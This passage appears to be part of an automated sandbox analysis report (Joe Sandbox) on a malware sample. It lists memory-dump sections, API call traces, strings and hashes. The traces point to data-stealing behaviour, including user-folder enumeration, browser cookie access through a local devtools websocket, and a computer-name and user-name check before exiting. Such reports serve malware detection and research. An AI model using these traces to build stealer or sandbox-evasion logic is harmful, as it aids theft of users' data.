                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                                  • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                                  • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                                  • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                                  Function 00412F60 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 374stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                                  • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                                  • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                                  Function 00406AA0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 416COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                                  • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                  • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                                  • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                                  • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                                  Function 004132F0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: block$|
                                                                                                                                                                                                                                                                                                  • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                                  • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                                  Function 0041D0C0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                                  • Opcode ID: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 393e261fe4cb7b69f2f042267bc96a23e416e0ea17d9edbe6cd76d0812bafa5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ea6202fed2a5655530ec6aaa809bab873c2cffd268538dd471dddcc126d90b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C11BFB0B416227B9B325B745C48FEB6BE8AF15B40B990037F401E2171EB5CD8C286AD
                                                                                                                                                                                                                                                                                                  Function 00401090 Relevance: 27.1, APIs: 18, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
